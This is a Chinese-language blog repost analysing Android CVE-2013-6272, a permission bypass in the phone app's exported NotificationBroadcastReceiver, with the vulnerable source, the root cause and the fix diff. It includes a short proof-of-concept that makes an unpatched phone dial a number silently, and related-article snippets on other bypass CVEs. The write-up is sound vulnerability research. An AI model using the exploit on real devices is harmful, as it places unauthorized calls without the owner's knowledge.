Android电话拨打权限绕过漏洞(CVE-2013-6272)分析

最新推荐文章于 2025-05-14 13:47:13 发布
最新推荐文章于 2025-05-14 13:47:13 发布
阅读量1.1w 收藏 3
点赞数 1
文章标签: Android漏洞分析 Android安全 CVE-2013-6272
CVE-2013-6272为安卓平台电话拨打权限绕过漏洞,由curesec发现并报告给Google。此漏洞允许未声明call_phone权限的应用拨打电话或挂断通话,影响Android 4.1.1至4.4.2版本。通过错误配置的BroadcastReceiver实现攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文:http://blogs.360.cn/360mobile/2014/07/08/cve-2013-6272/

1. CVE-2013-6272漏洞背景

CVE-2013-6272是一个安卓平台电话拨打权限绕过漏洞。该漏洞实际上是柏林的安全研究机构curesec在2013年底发现并秘密报告给google的,而并非是某国内团队发现的。Curesec同时也是安卓锁屏绕过漏洞(CVE-2013-6271)的发现者。Curesec于2014年7月4日公开了一个拨打电话相关的漏洞[1],我们对这个漏洞进行了分析。

这个漏洞在android 4.1.1版本中被引入,在4.4.3版本中被修复,手机系统版本仍停留在4.1.1~4.4.2的机型都收到了影响。

2. Android受影响版本

根据已经公开的信息和我们对于AOSP changelog的分析,该漏洞影响分布情况如下:

Android版本

SDK 版本

是否受影响

4.1.1

16

4.1.2

16

4.2.2

17

4.4.2

19

4.4.3或更高

19

3. 漏洞的危害

没有申明call_phone权限的应用无需交互可以拨打任意电话。任意应用可以挂断当前正在进行的通话。而用户对此毫不知情。

4.漏洞原理

此漏洞主要是因为一个误导出的BroadCastReceiver:com.android.phone.PhoneGlobals$NotificationBroadcastReceiver

让我们看下NotificationBroadcastReceiver的源码[3]

public static class NotificationBroadcastReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        String action = intent.getAction();
        // TODO: use "if (VDBG)" here.
        Log.d(LOG_TAG, "Broadcast from Notification: " + action);

        if (action.equals(ACTION_HANG_UP_ONGOING_CALL)) {
            PhoneUtils.hangup(PhoneGlobals.getInstance().mCM);
        else if (action.equals(ACTION_CALL_BACK_FROM_NOTIFICATION)) {
            // Collapse the expanded notification and the notification item itself.
            closeSystemDialogs(context);
            clearMissedCallNotification(context);

            Intent callIntent = new Intent(Intent.ACTION_CALL_PRIVILEGED, intent.getData());
            callIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK
                    | Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS);
            context.startActivity(callIntent);
         else if (action.equals(ACTION_SEND_SMS_FROM_NOTIFICATION)) {
            // Collapse the expanded notification and the notification item itself.
            closeSystemDialogs(context);
            clearMissedCallNotification(context);
            Intent smsIntent = new Intent(Intent.ACTION_SENDTO, intent.getData());
            smsIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            context.startActivity(smsIntent);

 

这个reveiver处理3种类型的intent,由于NotificationBroadcastReceiver是导出的并且没有做任何的权限限制,任意应用都可以发intent来调用这个BroadcastReceiver.

这3类intent的危害

Intent危害
ACTION_HANG_UP_ONGOING_CALL挂断当前的通话
ACTION_CALL_BACK_FROM_NOTIFICATION拨打任意电话
ACTION_SEND_SMS_FROM_NOTIFICATION发送短信,但需要用户交互,没太大危害

利用此漏洞拨打电话的代码

public void onClick(View view) {
    Toast t = Toast.makeText(getBaseContext(),
              "Testing call without permissions now!",
                Toast.LENGTH_LONG);
    t.show();
    Intent intent = new Intent();
    intent.setComponent(new ComponentName(
            "com.android.phone",
              "com.android.phone.PhoneGlobals$NotificationBroadcastReceiver"));
    intent.setAction("com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION");
    intent.setData(Uri.parse("tel:31337"));
    intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    getBaseContext().sendBroadcast(intent);
}

 5. 产生漏洞的主要原因

产生此漏洞的原因非常有趣,因为android开发人员的疏忽,本来限制

BroadcastReceiver导出应该在其标签中加上属性android:exported=”false”,但开发人员漏掉了”android:”,写成了exported=”false”,这样的属性是不起作用的,而包含有intent filters的BroadcastReceiver默认是导出的,从而导致这个BroadcastReceiver被误导出。

6.漏洞修复

此漏洞的修复很简单,其diff[3]如下:

        <!-- BroadcastReceiver for receiving Intents from Notification mechanism. -->
-        <receiver android:name="PhoneGlobals$NotificationBroadcastReceiver" exported="false">
+        <receiver android:name="PhoneGlobals$NotificationBroadcastReceiver" android:exported="false">
             <intent-filter>
                 <action android:name="com.android.phone.ACTION_HANG_UP_ONGOING_CALL" />
                 <action android:name="com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" /

 

目前我们尚未捕获到利用此漏洞拨打电话的恶意样本,但是该漏洞的原理及利用代码已经开源,所以有可能在未来被恶意利用。我们将会持续关注此漏洞并提供可能的解决方案。

 

参考:

[1]https://android.googlesource.com/platform/packages/services/Telephony/+/79fc3b3%5E%21/

[2]http://blog.curesec.com/article/blog/35.html

[3]http://androidxref.com/4.4_r1/xref/packages/services/Telephony/src/com/android/phone/PhoneGlobals.java#1128

Jack_Jia
关注
权限绕过漏洞(越权漏洞
记录并分享学习安全的知识点..
04-23 4314
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞产生的原因 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。越权又可以分为两种:水平越权与垂直越权。接下来,将深入分析水平越权与垂直越权。 二、漏洞简介 (一)水平越权 水平越权就是相同级别(权限)的用户或者同一角色的不同用户之间,可以越权访问、修改或者删除的非法操作。如果出现此类漏洞,那么将可能会造成大批量数据泄露,严重的甚至会造...
CVE-2024-2389 未经身份验证的命令注入
技术超强的网络安全平台
09-18 1573
应该注意的是,run() 方法还接受第二个参数,它是一个参数数组,将使用 escapeshellarg() 括在引号中,以防止命令注入。如果 run() 的第二个参数中将参数作为数组,则不太可能利用这一点,因为数组中的每个项目都被视为一个参数,并在调用 assembleCommand() 时通过 escapeshellarg() 传递。在 “PdfGenerator.php” 中,generate() 方法 [1] 只是调用 getExec.run() [2] 方法的包装器,该方法执行系统命令。
权限绕过漏洞
rane的博客
04-01 2415
目录水平越权案例漏洞原理分析测试实例防御方案 靶场:https://github.com/zhuifengshaonianhanlu/pikachu 搭建方法和sqli-labs相同 水平越权案例 A和B属于同一级别用户,但各自不能操作对方个人信息。A如果越权操作B用户个人信息的情况称为水平越权操作,通过水平越权漏洞实现修改或删除其他用户的个人信息 随机登录一个用户,点击查看个人信息,此处用的是v...
Next.js中间件权限绕过漏洞分析CVE-2025-29927)
最新发布
weixin_40666803的博客
05-14 116
是Next.js框架中存在的一个高危中间件逻辑绕过漏洞,允许攻击者通过构造特定HTTP请求头,绕过中间件的安全控制逻辑(如身份验证、路径重写、CSP防护等)。该漏洞CVSS评分,可导致未授权访问、数据泄露及拒绝服务攻击。
03-权限绕过漏洞
2301_79977730的博客
06-30 915
系统下面进行了sql查询,但是其中的adminrand用户可控,并且无过滤,接下来判断是否返回了一个1,如果返回1,则证明数据库中有我们传入的值。第二个判断,定义了一个Permissions,他从cookie中取groupMenu的值,如果不等于all,并且为空,就会拒绝访问。第一个判断,如果adminname的值为空,则跳出循环,并弹窗提示登录。访问后台地址:http://10.1.1.3/easytalk/admin.php使用test123 用户成功登录后台。工具路径:C:/tools。
broadAnywhere:Broadcast组件权限绕过漏洞(Bug: 17356824)
热门推荐
移动安全研究和Android/iOS/小程序隐私合规
11-17 1万+
原创内容,转载请注明来源 http://retme.net/index.php/2014/11/14/broadAnywhere-bug-17356824.htmlLolipop源码已经放出有些日子了,我发现google在5.0上修复了一个高危漏洞,利用该漏洞可以发送任意广播:不仅可以发送系统保护级别的广播、还可以无视receiver的android:exported=false、android:
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
然而, Dirty Cow漏洞利用了一个竞争条件,使得低权限进程可以在内核复制内存页之前修改数据,从而绕过通常的权限检查,导致任意的内存写操作。 5. **安全补丁与防范措施**: 发现漏洞后,Linux内核开发者迅速发布...
Android Binder漏洞CVE-2020-0041利用代码解析与分析
漏洞分析方面,存储库中提到了沙箱逃逸漏洞,这是一种攻击者通过绕过操作系统的安全限制,从受限的沙箱环境中逃脱到一个更自由的环境中,以获得更多权限和资源的攻击手段。对于特权升级漏洞,攻击者能够利用漏洞...
Spring Security身份认证绕过漏洞风险通告
geejkse_seff的博客
08-02 1069
当SpringSecurity中使用RegexRequestMatcher进行权限配置,且规则中使用带点号的正则表达式时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证,导致配置的权限验证失效。当SpringSecurity中使用RegexRequestMatcher进行权限配置,且规则中使用带点号(.)的正则表达式时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证,导致配置的权限验证失效。未经授权的远程攻击者可利用此漏洞构造数据包绕过身份认证,导致配置的权限验证失效。...
CVE-Flow:1999-2020年CVE数据分析
lp_cq242的博客
05-27 2182
给大家汇报一下最近工作,主要做了这么几个事情: 1999-2020年CVE数据分析。 增量CVE数据的T级监控。 EXP预警。 全局自动化。 产出及价值 汇总产出一份近20年来CVE原始数据集:CVE2020,且持续自动更新,具备66个属性。借助数据集,可以分析各个属性数据的外在表现,推测其内在规律,辅助安全工作。 经过交叉打标,产出带有EXP标记的CVE标记数据集:EXP2020,且持续自动更新。借助已有标记数据集,通过机器学习和深度学习算法训练,可以预测CVE被利用的可能性,有的放矢,提高预
shiro权限绕过漏洞
m0_67392931的博客
08-30 1400
漏洞可以用以下方法复现,首先在spring-context-shiro.xml中,配置 /hello/* = authc;Apahce Shiro 由于处理身份验证请求时出错,存在“权限绕过漏洞”(漏洞编号:CVE-2020-11989),远程攻击者可以发送特制的HTTP请求,绕过身份验证过程,并获得对应用程序的未授权访问。(2)删除shiro开头的jar包,集成单点登录的shiro-cas 不用删。注意:ant风格的路径仅出现一个*时才能成功,而**无法绕过。这里可以通过url双编码的方式或地址栏加;.
Android LaunchAnywhere组件权限绕过漏洞
道阻且长,行则将至
05-29 3161
文章目录前言LaunchAnyWhereAccount 管理机制历史漏洞原理分析漏洞的利用与防御BroadcastAnywhere漏洞具体原理分析漏洞官方修复方案总结 前言 Android APP 应用的攻击面多数集中在对外暴露(exported="true”)的四大组件(Activity、Service、ContentProvider、BroadcastReceiver)上,当组件设置 exported=“false” 或者是添加了权限保护的情况下,三方应用程序无法直接访问该组件,也就很难去借助该类组件攻
网络安全自学入门:(超详细)从入门到精通学习路线&规划,学完即可就业
jennycisp的博客
01-10 456
很多人上来就说想学习黑客,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。算上从学校开始学习,已经在网安这条路上走了10年了,无论是以前在学校做安全研究,还是毕业后在百度、360从事内核安全产品和二进制漏洞攻防对抗,我都深知学习方法的重要性。没有一条好的学习路径和好的学习方法,往往只会事倍功半。网络安全再进一步细分,还可以划分为:网络渗透、逆向分析漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。
Nacos权限绕过漏洞(CVE-2021-29441)复现
大大怪将军,你来啦!
04-14 7163
CVE-2021-29441 是 Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos 到安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。
Next.js 中间件权限绕过漏洞分析CVE-2025-29927)
柠檬i的博客
03-28 991
CVE-2025-29927是Next.js框架中存在的一个高危中间件逻辑绕过漏洞,允许攻击者通过构造特定HTTP请求头,绕过中间件的安全控制逻辑(如身份验证、路径重写、CSP防护等)。该漏洞CVSS评分9.1(Critical),可导致未授权访问、数据泄露及拒绝服务攻击。
android删除短信(绕过权限)
a468903507的专栏
05-03 2170
android的很多功能都是需要权限才能操作,还是有很多功能我们是可以直接操作的,只需要在配置文件中注明权限就行了,可是有些虽然注明了权限,但是还是会提示说你没权限。比如删除短信、让手机进入休眠状态(gotoSleep)。下面就介绍一下我是如何删除一条属于黑名单中的短信:                  1、获取你想要删除的短信的线程ID(因为我想删除最近收到的一条短信,所以我只需按时间进
Nacos身份认证权限绕过+漏洞利用工具分享
hackzkaq的博客
12-27 3130
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 在线解密查看内容:
身份验证绕过漏洞简析
若有战,召必回
11-25 1543
在这里的话会对get请求和post请求两个区分开,如果是get请求的话,会返回security-read,post的话是返回security-edit,这里要记住,咱们之前在搭建环境的时候设置的就是admin权限为security-edit。在这段代码中一直在传递的permissions,它的值为{“name”:“security-edit”,“role”:“admin”},这个其实就是咱们在刚开始的security.json中设置的admin权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值